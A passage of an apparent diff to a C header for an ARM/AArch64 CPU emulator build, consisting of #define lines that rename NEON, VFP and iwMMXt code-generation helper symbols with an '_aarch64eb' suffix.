gen_helper_neon_abd_s16_aarch64eb +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_aarch64eb +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_aarch64eb +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_aarch64eb +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_aarch64eb +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_aarch64eb +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_aarch64eb +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_aarch64eb +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_aarch64eb +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_aarch64eb +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_aarch64eb +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_aarch64eb +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_aarch64eb +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_aarch64eb +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_aarch64eb +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_aarch64eb +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_aarch64eb +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_aarch64eb +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_aarch64eb +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_aarch64eb +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_aarch64eb +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_aarch64eb +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_aarch64eb +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_aarch64eb +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_aarch64eb +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_aarch64eb +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_aarch64eb +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_aarch64eb +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_aarch64eb +#define gen_helper_neon_cgt_s32 
gen_helper_neon_cgt_s32_aarch64eb +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_aarch64eb +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_aarch64eb +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_aarch64eb +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_aarch64eb +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_aarch64eb +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_aarch64eb +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_aarch64eb +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_aarch64eb +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_aarch64eb +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_aarch64eb +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_aarch64eb +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_aarch64eb +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_aarch64eb +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_aarch64eb +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_aarch64eb +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_aarch64eb +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_aarch64eb +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_aarch64eb +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_aarch64eb +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_aarch64eb +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_aarch64eb +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_aarch64eb +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_aarch64eb +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_aarch64eb +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_aarch64eb +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_aarch64eb +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_aarch64eb +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_aarch64eb +#define gen_helper_neon_max_u32 
gen_helper_neon_max_u32_aarch64eb +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_aarch64eb +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_aarch64eb +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_aarch64eb +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_aarch64eb +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_aarch64eb +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_aarch64eb +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_aarch64eb +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_aarch64eb +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_aarch64eb +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_aarch64eb +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_aarch64eb +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_aarch64eb +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_aarch64eb +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_aarch64eb +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_aarch64eb +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_aarch64eb +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_aarch64eb +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_aarch64eb +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_aarch64eb +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_aarch64eb +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_aarch64eb +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_aarch64eb +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_aarch64eb +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_aarch64eb +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_aarch64eb +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_aarch64eb +#define gen_helper_neon_narrow_u8 
gen_helper_neon_narrow_u8_aarch64eb +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_aarch64eb +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_aarch64eb +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_aarch64eb +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_aarch64eb +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_aarch64eb +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_aarch64eb +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_aarch64eb +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_aarch64eb +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_aarch64eb +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_aarch64eb +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_aarch64eb +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_aarch64eb +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_aarch64eb +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_aarch64eb +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_aarch64eb +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_aarch64eb +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_aarch64eb +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_aarch64eb +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_aarch64eb +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_aarch64eb +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_aarch64eb +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_aarch64eb +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_aarch64eb +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_aarch64eb +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_aarch64eb +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_aarch64eb +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_aarch64eb +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_aarch64eb +#define 
gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_aarch64eb +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_aarch64eb +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_aarch64eb +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_aarch64eb +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_aarch64eb +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_aarch64eb +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_aarch64eb +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_aarch64eb +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_aarch64eb +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_aarch64eb +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_aarch64eb +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_aarch64eb +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_aarch64eb +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_aarch64eb +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_aarch64eb +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_aarch64eb +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_aarch64eb +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_aarch64eb +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_aarch64eb +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_aarch64eb +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_aarch64eb +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_aarch64eb +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_aarch64eb +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_aarch64eb +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_aarch64eb +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_aarch64eb +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_aarch64eb +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_aarch64eb +#define gen_helper_neon_qsub_s64 
gen_helper_neon_qsub_s64_aarch64eb +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_aarch64eb +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_aarch64eb +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_aarch64eb +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_aarch64eb +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_aarch64eb +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_aarch64eb +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_aarch64eb +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_aarch64eb +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_aarch64eb +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_aarch64eb +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_aarch64eb +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_aarch64eb +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_aarch64eb +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_aarch64eb +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_aarch64eb +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_aarch64eb +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_aarch64eb +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_aarch64eb +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_aarch64eb +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_aarch64eb +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_aarch64eb +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_aarch64eb +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_aarch64eb +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_aarch64eb +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_aarch64eb +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_aarch64eb +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_aarch64eb +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_aarch64eb +#define gen_helper_neon_shl_s8 
gen_helper_neon_shl_s8_aarch64eb +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_aarch64eb +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_aarch64eb +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_aarch64eb +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_aarch64eb +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_aarch64eb +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_aarch64eb +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_aarch64eb +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_aarch64eb +#define gen_helper_neon_tbl gen_helper_neon_tbl_aarch64eb +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_aarch64eb +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_aarch64eb +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_aarch64eb +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_aarch64eb +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_aarch64eb +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_aarch64eb +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_aarch64eb +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_aarch64eb +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_aarch64eb +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_aarch64eb +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_aarch64eb +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_aarch64eb +#define gen_helper_neon_zip16 gen_helper_neon_zip16_aarch64eb +#define gen_helper_neon_zip8 gen_helper_neon_zip8_aarch64eb +#define gen_helper_pre_hvc gen_helper_pre_hvc_aarch64eb +#define gen_helper_pre_smc gen_helper_pre_smc_aarch64eb +#define gen_helper_qadd16 gen_helper_qadd16_aarch64eb +#define gen_helper_qadd8 gen_helper_qadd8_aarch64eb +#define gen_helper_qaddsubx gen_helper_qaddsubx_aarch64eb +#define gen_helper_qsub16 gen_helper_qsub16_aarch64eb +#define gen_helper_qsub8 gen_helper_qsub8_aarch64eb +#define 
gen_helper_qsubaddx gen_helper_qsubaddx_aarch64eb +#define gen_helper_rbit gen_helper_rbit_aarch64eb +#define gen_helper_recpe_f32 gen_helper_recpe_f32_aarch64eb +#define gen_helper_recpe_u32 gen_helper_recpe_u32_aarch64eb +#define gen_helper_recps_f32 gen_helper_recps_f32_aarch64eb +#define gen_helper_rintd gen_helper_rintd_aarch64eb +#define gen_helper_rintd_exact gen_helper_rintd_exact_aarch64eb +#define gen_helper_rints gen_helper_rints_aarch64eb +#define gen_helper_rints_exact gen_helper_rints_exact_aarch64eb +#define gen_helper_ror_cc gen_helper_ror_cc_aarch64eb +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_aarch64eb +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_aarch64eb +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_aarch64eb +#define gen_helper_sadd16 gen_helper_sadd16_aarch64eb +#define gen_helper_sadd8 gen_helper_sadd8_aarch64eb +#define gen_helper_saddsubx gen_helper_saddsubx_aarch64eb +#define gen_helper_sar_cc gen_helper_sar_cc_aarch64eb +#define gen_helper_sdiv gen_helper_sdiv_aarch64eb +#define gen_helper_sel_flags gen_helper_sel_flags_aarch64eb +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_aarch64eb +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_aarch64eb +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_aarch64eb +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_aarch64eb +#define gen_helper_set_rmode gen_helper_set_rmode_aarch64eb +#define gen_helper_set_user_reg gen_helper_set_user_reg_aarch64eb +#define gen_helper_shadd16 gen_helper_shadd16_aarch64eb +#define gen_helper_shadd8 gen_helper_shadd8_aarch64eb +#define gen_helper_shaddsubx gen_helper_shaddsubx_aarch64eb +#define gen_helper_shl_cc gen_helper_shl_cc_aarch64eb +#define gen_helper_shr_cc gen_helper_shr_cc_aarch64eb +#define gen_helper_shsub16 gen_helper_shsub16_aarch64eb +#define gen_helper_shsub8 gen_helper_shsub8_aarch64eb +#define gen_helper_shsubaddx gen_helper_shsubaddx_aarch64eb +#define gen_helper_ssat 
gen_helper_ssat_aarch64eb +#define gen_helper_ssat16 gen_helper_ssat16_aarch64eb +#define gen_helper_ssub16 gen_helper_ssub16_aarch64eb +#define gen_helper_ssub8 gen_helper_ssub8_aarch64eb +#define gen_helper_ssubaddx gen_helper_ssubaddx_aarch64eb +#define gen_helper_sub_saturate gen_helper_sub_saturate_aarch64eb +#define gen_helper_sxtb16 gen_helper_sxtb16_aarch64eb +#define gen_helper_uadd16 gen_helper_uadd16_aarch64eb +#define gen_helper_uadd8 gen_helper_uadd8_aarch64eb +#define gen_helper_uaddsubx gen_helper_uaddsubx_aarch64eb +#define gen_helper_udiv gen_helper_udiv_aarch64eb +#define gen_helper_uhadd16 gen_helper_uhadd16_aarch64eb +#define gen_helper_uhadd8 gen_helper_uhadd8_aarch64eb +#define gen_helper_uhaddsubx gen_helper_uhaddsubx_aarch64eb +#define gen_helper_uhsub16 gen_helper_uhsub16_aarch64eb +#define gen_helper_uhsub8 gen_helper_uhsub8_aarch64eb +#define gen_helper_uhsubaddx gen_helper_uhsubaddx_aarch64eb +#define gen_helper_uqadd16 gen_helper_uqadd16_aarch64eb +#define gen_helper_uqadd8 gen_helper_uqadd8_aarch64eb +#define gen_helper_uqaddsubx gen_helper_uqaddsubx_aarch64eb +#define gen_helper_uqsub16 gen_helper_uqsub16_aarch64eb +#define gen_helper_uqsub8 gen_helper_uqsub8_aarch64eb +#define gen_helper_uqsubaddx gen_helper_uqsubaddx_aarch64eb +#define gen_helper_usad8 gen_helper_usad8_aarch64eb +#define gen_helper_usat gen_helper_usat_aarch64eb +#define gen_helper_usat16 gen_helper_usat16_aarch64eb +#define gen_helper_usub16 gen_helper_usub16_aarch64eb +#define gen_helper_usub8 gen_helper_usub8_aarch64eb +#define gen_helper_usubaddx gen_helper_usubaddx_aarch64eb +#define gen_helper_uxtb16 gen_helper_uxtb16_aarch64eb +#define gen_helper_v7m_mrs gen_helper_v7m_mrs_aarch64eb +#define gen_helper_v7m_msr gen_helper_v7m_msr_aarch64eb +#define gen_helper_vfp_absd gen_helper_vfp_absd_aarch64eb +#define gen_helper_vfp_abss gen_helper_vfp_abss_aarch64eb +#define gen_helper_vfp_addd gen_helper_vfp_addd_aarch64eb +#define gen_helper_vfp_adds 
gen_helper_vfp_adds_aarch64eb +#define gen_helper_vfp_cmpd gen_helper_vfp_cmpd_aarch64eb +#define gen_helper_vfp_cmped gen_helper_vfp_cmped_aarch64eb +#define gen_helper_vfp_cmpes gen_helper_vfp_cmpes_aarch64eb +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_aarch64eb +#define gen_helper_vfp_divd gen_helper_vfp_divd_aarch64eb +#define gen_helper_vfp_divs gen_helper_vfp_divs_aarch64eb +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_aarch64eb +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_aarch64eb +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_aarch64eb +#define gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_aarch64eb +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_aarch64eb +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_aarch64eb +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_aarch64eb +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_aarch64eb +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_aarch64eb +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_aarch64eb +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_aarch64eb +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_aarch64eb +#define gen_helper_vfp_mins gen_helper_vfp_mins_aarch64eb +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_aarch64eb +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_aarch64eb +#define gen_helper_vfp_muld gen_helper_vfp_muld_aarch64eb +#define gen_helper_vfp_muls gen_helper_vfp_muls_aarch64eb +#define gen_helper_vfp_negd gen_helper_vfp_negd_aarch64eb +#define gen_helper_vfp_negs gen_helper_vfp_negs_aarch64eb +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_aarch64eb +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_aarch64eb +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_aarch64eb +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_aarch64eb +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_aarch64eb +#define gen_helper_vfp_sltod 
gen_helper_vfp_sltod_aarch64eb +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_aarch64eb +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_aarch64eb +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_aarch64eb +#define gen_helper_vfp_subd gen_helper_vfp_subd_aarch64eb +#define gen_helper_vfp_subs gen_helper_vfp_subs_aarch64eb +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_aarch64eb +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_aarch64eb +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_aarch64eb +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_aarch64eb +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_aarch64eb +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_aarch64eb +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_aarch64eb +#define gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_aarch64eb +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_aarch64eb +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_aarch64eb +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_aarch64eb +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_aarch64eb +#define gen_helper_vfp_touid gen_helper_vfp_touid_aarch64eb +#define gen_helper_vfp_touis gen_helper_vfp_touis_aarch64eb +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_aarch64eb +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_aarch64eb +#define gen_helper_vfp_tould gen_helper_vfp_tould_aarch64eb +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_aarch64eb +#define gen_helper_vfp_touls gen_helper_vfp_touls_aarch64eb +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_aarch64eb +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_aarch64eb +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_aarch64eb +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_aarch64eb +#define gen_helper_vfp_uitos 
gen_helper_vfp_uitos_aarch64eb +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_aarch64eb +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_aarch64eb +#define gen_helper_wfe gen_helper_wfe_aarch64eb +#define gen_helper_wfi gen_helper_wfi_aarch64eb +#define gen_hvc gen_hvc_aarch64eb +#define gen_intermediate_code_internal gen_intermediate_code_internal_aarch64eb +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_aarch64eb +#define gen_iwmmxt_address gen_iwmmxt_address_aarch64eb +#define gen_iwmmxt_shift gen_iwmmxt_shift_aarch64eb +#define gen_jmp gen_jmp_aarch64eb +#define gen_load_and_replicate gen_load_and_replicate_aarch64eb +#define gen_load_exclusive gen_load_exclusive_aarch64eb +#define gen_logic_CC gen_logic_CC_aarch64eb +#define gen_logicq_cc gen_logicq_cc_aarch64eb +#define gen_lookup_tb gen_lookup_tb_aarch64eb +#define gen_mov_F0_vreg gen_mov_F0_vreg_aarch64eb +#define gen_mov_F1_vreg gen_mov_F1_vreg_aarch64eb +#define gen_mov_vreg_F0 gen_mov_vreg_F0_aarch64eb +#define gen_muls_i64_i32 gen_muls_i64_i32_aarch64eb +#define gen_mulu_i64_i32 gen_mulu_i64_i32_aarch64eb +#define gen_mulxy gen_mulxy_aarch64eb +#define gen_neon_add gen_neon_add_aarch64eb +#define gen_neon_addl gen_neon_addl_aarch64eb +#define gen_neon_addl_saturate gen_neon_addl_saturate_aarch64eb +#define gen_neon_bsl gen_neon_bsl_aarch64eb +#define gen_neon_dup_high16 gen_neon_dup_high16_aarch64eb +#define gen_neon_dup_low16 gen_neon_dup_low16_aarch64eb +#define gen_neon_dup_u8 gen_neon_dup_u8_aarch64eb +#define gen_neon_mull gen_neon_mull_aarch64eb +#define gen_neon_narrow gen_neon_narrow_aarch64eb +#define gen_neon_narrow_op gen_neon_narrow_op_aarch64eb +#define gen_neon_narrow_sats gen_neon_narrow_sats_aarch64eb +#define gen_neon_narrow_satu gen_neon_narrow_satu_aarch64eb +#define gen_neon_negl gen_neon_negl_aarch64eb +#define gen_neon_rsb gen_neon_rsb_aarch64eb +#define gen_neon_shift_narrow gen_neon_shift_narrow_aarch64eb +#define gen_neon_subl 
gen_neon_subl_aarch64eb +#define gen_neon_trn_u16 gen_neon_trn_u16_aarch64eb +#define gen_neon_trn_u8 gen_neon_trn_u8_aarch64eb +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_aarch64eb +#define gen_neon_unzip gen_neon_unzip_aarch64eb +#define gen_neon_widen gen_neon_widen_aarch64eb +#define gen_neon_zip gen_neon_zip_aarch64eb +#define gen_new_label gen_new_label_aarch64eb +#define gen_nop_hint gen_nop_hint_aarch64eb +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_aarch64eb +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_aarch64eb +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_aarch64eb +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_aarch64eb +#define gen_op_iwmmxt_avgb0_M0_wRn gen_op_iwmmxt_avgb0_M0_wRn_aarch64eb +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_aarch64eb +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_aarch64eb +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_aarch64eb +#define 